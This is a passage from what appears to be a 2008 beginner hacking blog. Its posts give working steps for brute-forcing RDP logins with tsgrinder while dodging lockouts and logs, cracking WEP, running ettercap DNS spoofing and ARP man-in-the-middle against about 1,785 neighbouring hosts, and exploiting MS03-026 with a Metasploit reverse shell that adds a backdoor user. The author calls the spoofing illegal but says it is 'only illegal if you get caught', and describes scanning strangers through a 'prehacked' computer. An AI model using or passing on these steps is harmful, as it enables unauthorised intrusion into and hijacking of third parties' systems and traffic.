etc.. I also recommend using the administrator account for these attacks, since by default it won't get locked out with so many password attempts. Also, if you noticed, tsgrinder will try 5 passwords, and then disconnects, and then reconnects, and trys 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts. This app won't throw a windows log file either. Now for the 1337. You just add the "-l" switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you vaguely how it works. There is also the "-n" switch which allows more then 1 session. So with one session you are able to try 5 passwords in 10 seconds, but if you use "-n 2" you will be able to try 10 passwords in 11 seconds. I haven't tried more then 2 simultaneously connections since it does slow your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3

WEP Cracking

2008-07-21T11:57:00.000-04:00

This is a guide I wrote a couple years back as you can tell since secuirty auditor has been backtracks for over a year now. Most information holds true still.
Needed:
2 Prism 2/2.5/3 wireless cards
2 Computers running Security auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Lets begin

Computer 1

Start up kismet

Press s to sort the AP’s

Press Enter on the AP your attacking get the following info
-Channel
-SSID
-BSSID

Press x to exit

Press shift + c get the following information
-PC

Exit kismet

Open terminal and run the following commands
Switch-to-hostap
Cardctl eject
Cardctl insert
Iwconfig wlan0 channel #
Iwpriv wlan0 hostapd 1
Iwconfig wlan0 mode master
Void11_penetration –D –s PC –B AP wlan0

Computer 2

Open terminal and run the following commands
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Aireplay –I wlan0 –b AP –m 68 –n 68 –d ff:ff:ff:ff:ff:ff

You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff

Click y to replay this ARP packet

Computer1

Since you got the above packet you can close void11

Open terminal and run
Switch-tp-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Airodump wlan0 cap1

Once you get 100,000 IV’s exit for 64bit keys 800,000 for 128bit keys

Open terminal
Cd /ramdisk (key length)
Aircrack –f 2 –m AP –n 64/128 –q 3 cap*.cap

In a while you should have you WEP key

NMAP

2008-07-17T08:34:00.000-04:00

Well hopefully you read my previous post on nmap. My friend came over was looking at nmap logs. He asked me why do I always print them to a file instead of browising it in a terminal. It's easier to search a file, for say the word "open". There is a problem I noticed when I print out the results to a file. It dosn't always print out the os option even if I got it from doing it in the terminal. Well anyway to print the output to a file you just add the following to the end of the command.

>>file location

This works on both unix and windows box's the following command is for a windows machine and the one that follows is for a unix box.

C:\Program Files\Nmap> nmap -p80 -P0 -sS 69.182.0.0/16 >>c:\folder\nmap.txt
#nmap -p80 -P0 -sS 69.182.0.0/16 >>/home/user/nmap.txt

Just a refresher of what everything means
-p80 port 80
-P0 run scan even if ping dosn't succeed
-sS Syn scan
IP The ip address of whom you are scanning or starting point in range
/16 Subnet 255.255.0.0
>> Where to ouput the file

Internal IP's on the internet

2008-07-14T11:39:00.000-04:00

So when I was routerless for about a month or so when ever I booted up my computer I noticed my computer was requesting for a DHCP address and it was talking to a 10.x.x.x address. So I decided to delv a little deeper to see what was going on. I fired up ettercap to collect DHCP requests and this is what I got.
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.93.130.73] OFFER : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.12.0.1] ACK : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219

Interesting huh? Well it gets even better. My IP wasn't even in te 24.*.*.* range.

sk0: flags=8843 metric 0 mtu 1500
options=b
ether 00:17:31:c1:d8:da
inet 96.x.x.x netmask 0xffffff00 broadcast 255.255.255.255
media: Ethernet autoselect (100baseTX )
status: active
So I searched all the IP's on ARIN and they are all owned by Charter, Newtown. So am I getting local IP's because cable broadband is just like a giant lan, I remember hearing that some but never develed to far into it.

DNS Spoof

2008-07-09T14:17:00.000-04:00

This will only work if the computer running ettercap is set as DMZ or has a direct wan connection. This is ILLEGAL! can't stress that enough, but like the saying goes it's only illegal if you get caught. This will only affect people on the same subnet as you. To show you how many people will be affected by this attack grab you IP address and subnet and convert it to binary. I'm going to use a comcast one for example.
71.235.115.114
255.255.248.0
01000111.11101011.01110011.01110010
11111111.11111111.11111000.00000000
I'm not going to walk you through how to do this bulian math, since you are trying to learn how to hack you should have a basic understanding of networking math. So this is what will be affected.
01000111.11101011.01110000.00000000-01000111.11101011.01110111.11111111
71.235.112.0-71.235.119.255
So that is 1,785 hosts that will be affected as long as you are intiating an attack.
Now on to the attack it self.
As I said earlier we will be running ettercap, I will be using it on FreeBSD.Firstly we need to edit the etter.dns file to input our entry.
#nano /usr/local/share/ettercap/etter.dns
There will be an example already in that will redirect microsft to linux website.

"microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56"

To get as many hits on my website as fast as possible I'm going to redirect google.com to my website.

"google.com A 64.148.32.238
*.google.com A 64.148.32.238
www.google.com PTR 64.148.32.238"

Now to run it. We use the following command
#ettercap -T -q -i sk0 -P dns_spoof -M arp // //

Let me break this down for all.
T = text interface
q = quiet
i = interface
p = plug
M = man in the middle
// // = specify all hosts

Thats it when ever anyone goes to google.com the will get redirected to wcosug.org. Notice this will only redirect to dns names that are directly binded to IP address, this will not work with virtual hosts. Since you need to use an IP and not a DNS name in the config file.

Friday night fun

2008-05-16T22:38:00.000-04:00

Well here is what I'm doing this Friday night all day I was playing around with network streaming video, I have been playing around with ffserver and VLC streaming. I got VLC working great except slow upload speeds for ffserver hasn't been working so great when ever I try to host a file this happens.
#ffmpeg -i /tmp/output.flv http://localhost:8090/output.flv
Seems stream 0 codec frame rate differs from container frame rate: 23.98 (65535/2733) -> 23.98 (10000000/417083)
Input #0, avi, from '/tmp/test.avi':
Duration: 00:21:49.8, start: 0.000000, bitrate: 1088 kb/s
Stream #0.0: Video: mpeg4, yuv420p, 640x480, 23.98 fps(r)
Stream #0.1: Audio: mp3, 48000 Hz, stereo, 128 kb/s
Output #0, flv, to 'http://localhost:8090/test.flv':
Stream #0.0: Video: flv, yuv420p, 640x480, q=2-31, 200 kb/s, 23.98 fps(c)
Stream #0.1: Audio: libmp3lame, 22050 Hz, stereo, 64 kb/s
Stream mapping:
Stream #0.0 -> #0.0
Stream #0.1 -> #0.1
Press [q] to stop encoding
Broken pipe

I played with it for serveral hours today but still havn't gotten it to work, I'll prob put a couple more hours in tomorrow to get it to work, but it's friday night it's hack time. (lol) So VLC uses the default port of 1234 and ffserver uses 8090. I've mapped about 2,000 ports so far and only found 3 comps listening on 1234 and only one of them is VLC but its encrypted so have to go back to looking. To let you know how NMap I use a prehacked computer run tor network and run NMap, I'll get a guide up on how to install tor soon enough. I registers that I'm in germany and if you constantly check back like every 10 min it will say you are some where else. I'll post my results up this weekend. This should be a good reason for people not to use default ports, always use off ports for personal use.

MetaSploit

2008-05-13T08:45:00.000-04:00

A good way to learn how to start hacking is setting up a practice box. I usually just setup a fresh install of XP with no update. This makes life easy it's like progressing, you start with an open box try to hack it, patch it try to hack it again, secure it try to hack it again etc.. so you learn how to grow from the bottom up. Believe it, it is 2008 and there are still some people who do not run sp2 which will shield you from my following example. Metasploit is great program for n00b's you can see the Framework so you know how it works and you can monitor your network or the hack box for you can see exactly what it is doing. For this example I'll be using metasploit web interface which I never used a couple years ago. So you launch the interface and browse over to http://127.0.0.1:55555 for this example I will be using the Exploit Microsoft FPC DCOM MS03-026 once you select it you will be prompted with payloads I always choose win32_reverse which will give you a command prompt to that computer. My advice would not to use VNC since it will look the user out of there computer and they will notice somehting is up. I like to make my own user account so If I'm ever actually at the computer I have a username and password. So when you deliver the payload you will get this.
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the users password, change admin password etc.. have fun with it.

Proxy

2008-05-07T10:10:00.000-04:00

To start off you are going to want to use proxys. It is a good habit to get into in case you are just browsing the web and come across bad source code later on and want to exploit it. Its relativley simple. You can just google anonymous proxy and get a list of proxy servers. You might have to try around 10 of them to find one that is working and isn't uber slow. To setup a proxy on Firefox in linux you go to
Edit
Options
Advanced
Connection-Settings
Manual proxy configuration
Then you would just fill it in according to the information you found on the proxy list. To test you just browse to whatismyip.com and if it says your Ip is that of the Proxy server then you are ready to go!

NMap

2008-05-06T10:04:00.000-04:00

Nmap is a great tool, first you install nmap I'm a FreeBSD guy so to install all I do is.
#cd /usr/ports/security/nmap
#make install clean
Now nmap is installed there are many type of scans you can do. I choose to do syn scans. A syn scan is pretty much like playing ding dong ditch. You Initiate a 3way handshake and you wait for the response and leave you never return the third handshake. To do a syn scan you use the switch -sS. Another good switch you will want to add is -P0(zero) this will make nmap run even if it doesn't get a respond from the ping. This is good because allot of firewalls block icmp requests. The most important switch is the port switch -p"port#". You can either tell nmap to look at a port or a range of ports, I usually choose port 3389 mstsc port, You will find out what OS its running, XP Vista Server 2k of server 03 just by logging on. so the command will look something like this to scan 3389 with all the switches I talked about.
#nmap -p3389 -P0 -sS
The next thing you have to include in the command is the IP address. You can either scan an IP or a range of IP. I usually scan a range on Thursday night for by the time its Friday night I'll have something to do. To scan the IP 192.168.1.107 you would do this.
#nmap -p3389 -P0 -sS 192.168.2.107
To scan 192.168.2.0-255 you would use the /24 for all of you who don't know what the 24 is it means 255.255.255.0 which equates to 24 1's 11111111.11111111.11111111.00000000 so the command will look something like
#nmap -p3389 -P0 -sS 192.168.2.0/24
The results of the Scan will look something like this.
PORT STATE SERVICE
3389/tcp filtered ms-term-serv
If the program isn't listening on 3389 and you have a firewall it will say filtered. If nothing is listening on the port and you don't have a firewall it will say closed and if something is listening on that port it will say open.

Programs

2008-05-06T09:08:00.000-04:00

Lets get this straight 90% real hackers do not use pre made programs. What alot of hackers due is browse the web and look at source code for bad code or an opening. But I'm going to go with that most you don't know html, php etc... enough to spot these flaws. There are plenty of great tools out there for beginners to use such as.
Nmap
metasploit
tsgrinder
Security is a big thing for a hacker to practice, you don't want your scans coming back to you like a company calling you isp and saying this guy is port scanning me. So it is a good idea to always use a proxy or a proxy chain. Its pretty easy to find out who's port scanning you. I opened a log off my firewall and got this IP of someone who portscaned 5 of my ports 216.77.188.54 then I just go to Arin plug in the IP and bam I have an ISP Bell south and a location in the country Atlanta GA.
If you nmap a company with a static IP you probably will never get a call, unless they have an anal tech guy. It would take me about a week to go through a day of port scan logs so its not very worth it in my perspective. But do this without a proxy at your own risk. And make sure the proxy is anonymous and not transparent. LOL

Welcome

2008-05-06T08:49:00.000-04:00

So I'm going to introduce some of you into the world of hacking. Over the next couple months I'm going to teach you how to come from being a complete n00b to script kiddy to some one who knows there stuff. Theres many different types of hackers I'm not going to get into the hacker vs cracker speech because the are both good skills to have. I find hardware hacking more fun the software, probably because I'm good at hardware hacking, but I've been teaching myself computer hacking for a couple years now and I'll show you what I have learned. Not all hacking is bad it comes in very handy when you are a Network Administrator. Well Hope you guys enjoy